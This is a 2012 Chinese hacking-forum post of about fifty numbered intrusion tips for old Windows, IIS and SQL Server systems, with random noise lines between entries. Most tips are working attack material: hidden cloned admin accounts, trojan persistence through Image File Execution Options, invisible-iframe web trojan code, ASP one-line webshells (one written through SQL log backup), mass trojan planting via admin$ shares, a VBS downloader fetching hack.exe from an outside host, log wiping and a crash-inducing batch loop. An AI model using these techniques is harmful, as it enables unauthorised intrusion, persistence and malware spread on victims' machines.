中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
# m' {' b" U; t {
cacls C:\windows\system32 /G hqw20:R
! `8 e9 ~3 {7 g7 G: i+ @% k
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
2 t1 w8 W+ @" F+ w6 ^9 ^' M
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
: C3 R) `/ ^0 j/ Z
- w+ N6 i3 B- P3 h# T
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
$ N# P9 t' A f
0 a' ^+ v2 k- A& q) |/ ~- l
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, y+ n% q) b, D: I' f5 C' F
; b& H7 t9 _1 C1 c
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
6 E! q& W: f' h8 H
, F* M6 q5 y# \* e$ v
5、利用INF文件来修改注册表
8 Y1 i5 u& D0 i% ^* q5 e/ j
[Version]
8 s. K5 G# _+ `( U R
Signature="$CHICAGO$"
2 A7 z5 s2 }$ @
[Defaultinstall]
. b+ c- _) c0 s' h
addREG=Ating
! U) I' V$ K* f4 }0 j
[Ating]
6 |5 _8 n5 M. {! n; Y6 r* p7 T; `
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
! x# a" l" E2 e- ^/ d$ \- B
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
0 ]$ v9 ]. L& g) {0 r, {* G$ w
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
' i5 a5 g8 Z8 m
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
* R# m! A' R" O) A4 m
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
( U8 G' Q. X8 c1 ?8 c$ |
HKEY_CURRENT_CONFIG 简写为 HKCC
" N8 b& b3 C1 Z( X
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
2 U/ s' H5 R% q& \3 B
"1"这里代表是写入或删除注册表键值中的具体数据
# a, K# K2 N9 g; P
9 C* o, j( V I; F. ?1 M
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
+ w' s* ~, j6 _- A. Y1 n M
多了一步就是在防火墙里添加个端口,然后导出其键值
! o' A+ J9 M, i/ J2 @5 ?
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
" ~/ Y$ f0 ?9 o8 ?" i9 K
; h7 l5 x1 @1 u' w) {# E3 C( y, ^
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
7 h3 M: a7 N' s# D$ G
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
1 j# A$ }* {( {2 g% `+ d
3 N+ a m/ {0 J, s
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
" ~( o Z( L5 @" k% m1 i
, F$ x) B. u6 {; \
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
8 ~* @$ Y0 V3 @1 w
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
! E7 X6 i' ]* O, O
0 _' v3 J7 Q H+ D
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
/ S+ @$ o0 M Q& p7 O
) w( d8 u* n) \& U6 R/ f( V1 s
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
1 K { |" t4 u
用法:xsniff –pass –hide –log pass.txt
9 Q: ?+ O5 X1 m0 p) z
3 g) ? Z" Z- [; @
12、google搜索的艺术
5 R/ Q1 b( _* l! }/ }- z& l9 ^
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- ^/ R+ }) \ G, d
或“字符串的语法错误”可以找到很多sql注入漏洞。
/ T4 P8 `' D! |
2 y' ]* D V F+ d, X( \
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
7 z8 I2 y2 K9 S0 p
+ I4 B A& \3 G% q* W
14、cmd中输入 nc –vv –l –p 1987
$ q% R3 B/ D9 ]5 Z5 Q' [* S
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
( q" [# Y: S+ K8 B" ?, n- g Y
" e: T) ~( F1 C2 A8 ^
15、制作T++木马,先写个ating.hta文件,内容为
+ J2 l: P: H3 [4 E1 g
<script language="VBScript">
( {3 r3 f6 E+ C; c% k" `
set wshshell=createobject ("wscript.shell" )
: z7 V, s, i" Y' W U0 [+ C
a=wshshell.run("你马的名称",1)
6 r* H: r) K b
window.close
) T0 i' t" [! a0 I K! Y5 \4 [
</script>
* T% L. f% ^/ c4 z8 _7 l
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
- P, N' v: M4 ?1 ~
( T# C" m/ J+ F5 V% _
16、搜索栏里输入
& M/ Q2 C( a; K* y7 L
关键字%'and 1=1 and '%'='
8 T$ O( b6 t) e4 K9 p8 s' D9 g
关键字%'and 1=2 and '%'='
6 d2 I, d/ [1 u! o
比较不同处 可以作为注入的特征字符
4 p4 k+ c) X9 l5 ~
; K# Y" |- m* W$ U8 q u @6 g6 ~% \
17、挂马代码<html>
9 @" J# ^) s, t/ B
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; K6 L. g5 a3 I; r. |( P, w. y, f. x' X
</html>
7 z# d* E/ {4 f( E O$ {
! v* @( @. M! @; \1 s5 r
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
1 ^8 K I4 a6 V0 W5 t+ ?
net localgroup administrators还是可以看出Guest是管理员来。
2 d( S9 k6 n" [ x1 C
# q- @* @! |' c9 |& p
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( \. r5 R5 ^8 A+ t
用法: 安装: instsrv.exe 服务名称 路径
7 d! n5 m( {5 I2 t& g
卸载: instsrv.exe 服务名称 REMOVE
+ u( z& ?& W* K2 S* L+ l
& O2 _! s% A7 F5 _! @ H
g: J- ~0 ]+ j" k
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 \* }+ W0 K* h0 e: m
不能注入时要第一时间想到%5c暴库。
, ?: c; d. q: r( e2 F/ m
$ v0 w) H. F1 v k+ k
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
- s% ~- n$ c8 T4 } l# k0 ~
. X v. X# t, S; o+ z; C
23、缺少xp_cmdshell时
8 d% @& i! }3 M6 c
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 }3 u8 a. Y% R2 Y8 _4 j
假如恢复不成功,可以尝试直接加用户(针对开3389的)
" C, X/ X! p# H8 Y# E& O( @
declare @o int
& F3 V/ y7 Q# [2 N
exec sp_oacreate 'wscript.shell',@o out
* f3 z4 b- q9 d) y1 d6 ?
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
! [; S9 V& t6 e. L+ [+ P$ L! U
- G. t2 q( f7 |, h' c' f# D) x3 [
24.批量种植木马.bat
F* o+ G+ A% S1 n5 c' s+ U
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
6 I2 X! A& v. b. w
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& x- {7 Y5 n& W% |. G- x1 F- k
扫描地址.txt里每个主机名一行 用\\开头
& ~# H4 i! ?# C
6 ~* V9 c' F" P5 V
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
6 A5 N o9 K$ x/ M2 \3 U
( O) K$ W* x: ^$ G' q, h) p) n
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ ^' ~( r2 L/ _% ^4 T8 [
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
|5 l l8 P& h
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
! H& s0 Z( D# C, e4 W9 @ v( k( Q" O
) I, N4 ~) J- y
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
4 ]' x! L3 V$ T1 f2 @ j5 X3 T
然后用#clear logg和#clear line vty *删除日志
- X8 t/ |. P1 }! Q
! x0 S8 S! T$ j+ W1 C4 `8 }
28、电脑坏了省去重新安装系统的方法
, o, i; u8 L. x
纯dos下执行,
. f9 S* c6 h" E# P* x
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
: L7 H! c; @* i9 f
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
2 ~& ~9 v& C2 }; a7 u
3 X* ~* h5 D9 @( ^5 @1 g- K
29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 M6 a' \9 y9 `* M) M$ i
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
* `) v! W( i. u
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) u4 e4 M2 o2 A" L1 j
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& Y i2 [0 |' F- U
分别用
' V5 a$ n. M$ i7 t+ v) g9 r
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- G) i. x: u& s* R- [8 |4 s
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& ^' E4 h, x' ]( X6 W+ ~7 k7 R
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# ~ J4 a; V" F2 S( M: @
命令来导出注册表项
# b4 u1 G% J: B l1 ?: P
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
1 {' l0 z% x9 G3 \# M/ _
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
+ N W/ N1 X* L1 G% \8 M& M! A
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
$ ], `! _- I- @5 W
# v5 h! J9 {# g5 E2 [& d% o# s: M
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
5 g q5 V8 z' @" Q8 ]8 e/ q
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
0 O: {8 x) G) n; T# q
# x* _2 C3 y; w5 I$ {9 H
31、全手工打造开3389工具
' a0 D, }) \1 h- y! @9 m5 Y- J
打开记事本,编辑内容如下:
* @ O& \; C: P% G9 ^# i/ d# ~
echo [Components] > c:\sql
4 N+ Q" ^; F, f- P7 H' q4 u
echo TSEnable = on >> c:\sql
1 r8 ?- Q' ?0 h- a* ^3 W5 S; B
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
4 {: g+ r: O& k5 Y& F* W- u0 E
编辑好后存为BAT文件,上传至肉鸡,执行
* ~* t/ }6 h' K3 X( `
# [7 _/ r; t7 W" h& F
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
8 n5 ~! h- c; @0 |. `8 A' \/ \$ K
# I% k* ?0 S- }, j8 X% W5 `
33、让服务器重启
2 e2 ^# t# [* p& h
写个bat死循环:
1 y& P, ^, z3 c4 G' J
@echo off
9 l# f1 L; N* {) D7 W
:loop1
D# U* [4 q7 r3 S
cls
8 |1 h& m1 C& S8 U
start cmd.exe
; b2 }1 f, U1 K
goto loop1
2 x! E" u6 V7 N4 ]$ Q& F5 I4 H
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
* V- M7 U2 }8 e, a N& D
8 Y1 y5 k! i/ l2 G7 H1 ?& S
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
% m2 D" R6 n7 ]2 }
@echo off
; I+ I5 \, v3 d- B
date /t >c:/3389.txt
" y1 K( B( b8 O1 a" d, H! Q
time /t >>c:/3389.txt
* Z$ E9 z( X6 a" w2 i" p
attrib +s +h c:/3389.bat
( b% W7 n4 J q$ ?
attrib +s +h c:/3389.txt
5 ]' l$ s! [$ b) e( A
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; j+ ~( R& x8 l6 C) o& p+ \
并保存为3389.bat
6 r7 D4 @) ]: M: A% Q1 S
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
1 `8 b! D$ A0 \* M* T* U
$ g1 C( p( J$ U$ t, M+ Q
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
9 B0 ?& G' ~1 W* [% N3 `
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
! c1 j; m- ~& ^% ^7 r
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
; k! @6 V) x- U N$ \; u: N
. f* M% [& I# b0 `7 n) d) M
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
/ L; L5 E9 A& G5 N& L7 G+ _9 L
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
, D* {2 _7 C% a/ U: W
echo 你的FTP账号 >>c:\1.bat //输入账号
U. ]& V$ u: G, k# m8 ~) C3 E1 c
echo 你的FTP密码 >>c:\1.bat //输入密码
5 \. O& y1 Y! M z, s# N1 J
echo bin >>c:\1.bat //登入
' z5 h& F+ T4 V7 a
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
$ J* p6 \$ s; D' ^2 ?- k! L8 S, f
echo bye >>c:\1.bat //退出
' o" ^9 @3 t4 v1 ^* O: q
然后执行ftp -s:c:\1.bat即可
5 V8 e7 i4 [( p0 g
+ K8 B1 j5 T/ [* W- m( ~
37、修改注册表开3389两法
3 D5 h A2 x- I$ |
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
# Z4 z) t4 J& t
echo Windows Registry Editor Version 5.00 >>3389.reg
- M1 _' c3 T, C* Y( d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
/ |7 b/ H2 E6 Z( w2 F3 N2 i
echo "Enabled"="0" >>3389.reg
; s5 C) ]9 Q/ k0 D) F; }0 p3 k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
8 K/ o$ P: k3 I, L
NT\CurrentVersion\Winlogon] >>3389.reg
# c6 P: f+ G2 U0 c& }" {+ k
echo "ShutdownWithoutLogon"="0" >>3389.reg
2 S, N' ~, ]& @5 N
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
2 G; ]6 G* f8 v) e2 ~, E* E
>>3389.reg
' ~: R) @1 P8 o0 S0 u
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
$ p( y- O( f* y6 t: ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
- ~5 P, v9 b# d
>>3389.reg
7 r6 N# z6 | |% h" q$ ]4 _! O$ j' E& J) d
echo "TSEnabled"=dword:00000001 >>3389.reg
* _ x0 D9 ]# Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
6 P1 B+ e ?5 Y8 ]& E; W. R; G
echo "Start"=dword:00000002 >>3389.reg
$ h* w/ Z1 L0 G/ ?& ^) U9 q- h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
3 y. o( D* F6 T
>>3389.reg
0 P* p4 `: Y0 G& N: T
echo "Start"=dword:00000002 >>3389.reg
5 a) m8 S6 @4 V- C* H! ^
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
/ T, V9 `: P [
echo "Hotkey"="1" >>3389.reg
! L* o9 y+ h3 g3 B2 \ k+ Q" M* A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 S" O* y, n- T
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
$ K8 p3 s; O* N$ {
echo "PortNumber"=dword:00000D3D >>3389.reg
. l/ ^6 X1 O( c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 C* m* o# ?+ H' o- `* ~* ]) X9 i- p
Server\WinStations\RDP-Tcp] >>3389.reg
, j2 J7 I; b0 g
echo "PortNumber"=dword:00000D3D >>3389.reg
/ \ @4 a4 ?/ f* i
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
) M& w( k% K% [7 Q
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, ~8 { q' M- R3 L
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
* L/ o& k; J( U: d7 x0 R( Z
(2)winxp和win2003终端开启
# i f+ k. P0 e# |+ a ?( C2 d; ^
用以下ECHO代码写一个REG文件:
5 j2 u0 Y$ J% B, N) a
echo Windows Registry Editor Version 5.00>>3389.reg
3 Y; m9 H" J1 L) G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 i% o9 b( [$ ]6 S$ D
Server]>>3389.reg
# q/ x, I' t) v* Q
echo "fDenyTSConnections"=dword:00000000>>3389.reg
: Q. I) l- z' y6 B* S6 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 ^( _6 |8 U# o. A! F% Y
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
1 N/ _: [& ?' u2 l; k6 D' C& B) d
echo "PortNumber"=dword:00000d3d>>3389.reg
1 L( Q$ ^( K6 v9 s+ D9 h' Q" A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- Q" J8 Y4 F* q( k; y
Server\WinStations\RDP-Tcp]>>3389.reg
- i' }; W1 a3 h5 x7 I* q8 P
echo "PortNumber"=dword:00000d3d>>3389.reg
" s8 e. G, r; f, b2 C" E( f7 J
然后regedit /s 3389.reg del 3389.reg
9 B2 t7 U/ T3 X2 t
XP下不论开终端还是改终端端口都不需重启
8 r$ J: e% g/ Q- G9 L
% I, ^( _! r Q% E2 r. X) n; t) L2 y
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
3 n6 x# C5 l+ I3 r/ C. f
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- i9 c3 s3 V- q8 `- @1 S' M9 C
! B/ n0 M R4 ]+ k! [
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
' C: S6 e/ \5 g) `! O
(1)数据库文件名应复杂并要有特殊字符
) q" @5 m7 Q: A) ~& L0 [9 h
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
5 P7 D |) ~' H3 z' H! U! k! _$ B
将conn.asp文档中的
7 e9 l3 ~1 k; ]1 m2 t
DBPath = Server.MapPath("数据库.mdb")
8 B" D. ` v2 d3 M# ]
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
! `7 J6 q- F% T3 I% D
2 Z( J8 q$ x5 H* n- M9 K! A
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
& J% M$ A+ R( M: G% u3 H
(3)不放在WEB目录里
3 v# c- a7 s5 K* \
2 I: T! @* G0 H" {5 K8 @+ y* j
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
7 ^9 r7 o& V: h' D! ]! A
可以写两个bat文件
# R4 p' T" a. e8 T5 `# T/ n( V
@echo off
3 J$ u, P5 B1 S8 I& K
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
* w$ o1 [5 [8 i& K
@del c:\winnt\system32\query.exe
( D2 V, q" }8 B% H# N Q' [; O7 q# {
@del %SYSTEMROOT%\system32\dllcache\query.exe
) {/ ^, c7 t4 D C8 c8 {
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
. I0 Z5 T4 {. X* o3 Y0 y3 W# a0 p, e( K
% B/ r5 @5 v; ]! n) s
@echo off
2 q! \& T, c M3 w: F
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 v8 d( w$ x- h, H
@del c:\winnt\system32\tsadmin.exe
) _0 c# H9 v; W( ~& p! r5 Z
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
* Q( G- k3 A/ y2 E* i0 h
; x t- d% a4 [0 v" h% n g
41、映射对方盘符
0 \+ W1 {( T' y0 ]
telnet到他的机器上,
0 h4 r, |* x. H8 y1 G
net share 查看有没有默认共享 如果没有,那么就接着运行
2 E9 p' l4 O/ F* Y# o% B1 ?
net share c$=c:
4 h) ]: {+ _$ Z
net share现在有c$
3 h! \4 o9 R {2 f. G% o& _
在自己的机器上运行
' X& } n2 q+ o* |3 W/ ?% p
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
/ j# l+ L5 n. s9 Q& |
8 m" H6 w* x/ J" D( O- G! L: U
42、一些很有用的老知识
4 |# o2 _* g& R# K+ ]1 S; p$ b$ a
type c:\boot.ini ( 查看系统版本 )
8 C1 M* J* w# O6 B
net start (查看已经启动的服务)
8 U0 o8 W7 f" f! J3 z
query user ( 查看当前终端连接 )
! z& @9 A- w6 B- a" F; [" M2 j: G
net user ( 查看当前用户 )
4 {3 |% A3 j- _5 U P
net user 用户 密码/add ( 建立账号 )
/ O! i; M, F3 E# j
net localgroup administrators 用户 /add (提升某用户为管理员)
3 `" v" H8 Q5 J3 R; c2 K
ipconfig -all ( 查看IP什么的 )
! M. q0 s- h5 O& {2 u- j1 a
netstat -an ( 查看当前网络状态 )
! E8 T' K( W$ n$ V6 ]$ z# ?4 p
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
6 t' k6 R. t6 d0 [; L
克隆时Administrator对应1F4
: b! U& |# v6 W! ^# @
guest对应1F5
2 ^1 I+ c. H2 ?! _9 ?5 q7 {
tsinternetuser对应3E8
! X" N: C! S+ X& I/ C
* p- x9 Q5 d6 S. n( z3 `% t
43、如果对方没开3389,但是装了Remote Administrator Service
6 ^ c$ Q% J5 d- c8 R
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
# r. u- G3 N) e$ M
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& T+ D! e: }5 `# b4 ~6 y
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
5 v$ Z8 w* V4 l% m% T( o- n0 g
) Q _3 Y d+ F9 r* M$ L1 u
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
! n% }" U% G/ k5 @. @' Y+ w
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
8 i F6 D1 i+ p2 n% k7 C/ h
; @. ^! F$ s r! ?4 \
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
3 o4 O: P6 B4 I& _4 n/ Z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
1 M. }# L' h9 x. }/ [( |
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
- g; f: Y2 K$ n
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
' E9 C6 {3 X! u( Q
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
( Y7 m; w3 _, R, c( M
(这是完整的一句话,其中没有换行符)
+ ^. Y) q: N& u- m% W( {, T
然后下载:
, J; M' M) k6 M; I9 n S
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
6 z& e( j u7 X, h
. g' F# h$ Y! L2 L# d; V2 q
46、一句话木马成功依赖于两个条件:
) X: h0 E& J/ M' D
1、服务端没有禁止adodb.Stream或FSO组件
0 l E2 @. [2 J1 H6 ~+ G0 y
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
B& O4 O# M8 N( O2 _! d
3 H& k) j9 G* w6 |% u
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
2 j7 t! P+ {# \# a6 {2 T
;alter database utsz set RECOVERY FULL--
3 m x3 @# W4 q5 _/ @5 h9 e1 r/ t6 @
;create table cmd (a image)--
. H. O+ j- s P2 \' D! f. l$ v
;backup log utsz to disk = 'D:\cmd' with init--
5 C k# S! V$ T+ w# E" f8 o
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
8 b0 e( X `& X' {& ?" }
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
' S4 E! m9 b3 J$ x- k* ?0 V% X
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
. h9 @ q) z, m
1 M- w7 x: S( S9 q( P N' ^, H: T
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
. E' M( {( `$ z' s8 \1 l
1 ^2 l0 J. g$ b
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
- X: i5 @- M9 `3 s! L& r
所有会话用 'all'。
6 z1 g P( f: \1 x$ L8 T0 p
-s sessionid 列出会话的信息。
. G! \. a; E S7 g
-k sessionid 终止会话。
h8 }% A; N1 J( A5 X k& m
-m sessionid 发送消息到会话。
- m$ f- F! E+ e5 d) e- r
) Y% t) M! ]; a4 j+ ] o
config 配置 telnet 服务器参数。
, J; E7 M$ O1 y p; A$ M
9 h3 a9 ?: e' m6 m5 w, e
common_options 为:
: R! q+ S- _7 f. z; V2 P* L
-u user 指定要使用其凭据的用户
, s+ H) j; q6 V* o; o, h
-p password 用户密码
$ t s$ m/ O6 l! M1 h
' q3 W5 d6 X" q; z6 E
config_options 为:
' E9 ^" b) Y& o) I Z) k
dom = domain 设定用户的默认域
" z4 b8 L' j5 R; ^+ }( m; Y% D
ctrlakeymap = yes|no 设定 ALT 键的映射
; }1 E! w0 x5 `
timeout = hh:mm:ss 设定空闲会话超时值
# t2 g( j: C. E0 i
timeoutactive = yes|no 启用空闲会话。
: \( Z4 E: t- d' B \
maxfail = attempts 设定断开前失败的登录企图数。
$ o6 c4 x; E6 i, u( H4 `$ Y
maxconn = connections 设定最大连接数。
2 C# G/ S% M. y3 `( O& A
port = number 设定 telnet 端口。
( k! s* l5 |& H# k; D! i
sec = [+/-]NTLM [+/-]passwd
" H) `: O, o; a8 `
设定身份验证机构
$ o, g0 ]$ H O! U3 b! G
fname = file 指定审计文件名。
# k, r h5 X( E1 J0 X
fsize = size 指定审计文件的最大尺寸(MB)。
5 M; J% t: x) ^# x, ?9 p9 K) ?
mode = console|stream 指定操作模式。
* z+ B2 x8 H; G% b) F
auditlocation = eventlog|file|both
( _1 L" }- ?+ b% ?6 q) ]* l6 \- f
指定记录地点
) `4 |6 e( i) T7 @
audit = [+/-]user [+/-]fail [+/-]admin
& N8 P" s- ^5 I3 a, M) Q
2 z1 v7 Z* Y( J$ t9 g) j( K4 X
49、例如:在IE上访问:
* ?3 s4 m; B1 F' y& {* d: Y
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
- }5 G1 r; | Q1 }
hack.txt里面的代码是:
' D% Q1 Q( q% `: M
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
0 h+ q& i# {& g. @+ ~/ B2 y: t
把这个hack.txt发到你空间就可以了!
@3 C7 K) r4 g, J& u/ K
这个可以利用来做网马哦!
5 }, V# M! g9 _0 _, r/ l. U
4 a' V- q. ]6 ]* e: f# Y, O) B
50、autorun的病毒可以通过手动限制!
% Q# h$ i& o! `4 U1 ?6 o3 P& N& j4 P* {
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
) N& M \4 r3 p% }8 H l: d8 z0 Q* C! {
2,打开盘符用右键打开!切忌双击盘符~
# l5 K, l8 A6 ?5 B, B
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
# o9 m6 R1 p9 m8 U' k F
, T. T! I) p' d
51、log备份时的一句话木马:
6 ^: E* E, S: ^
a).<%%25Execute(request("go"))%%25>
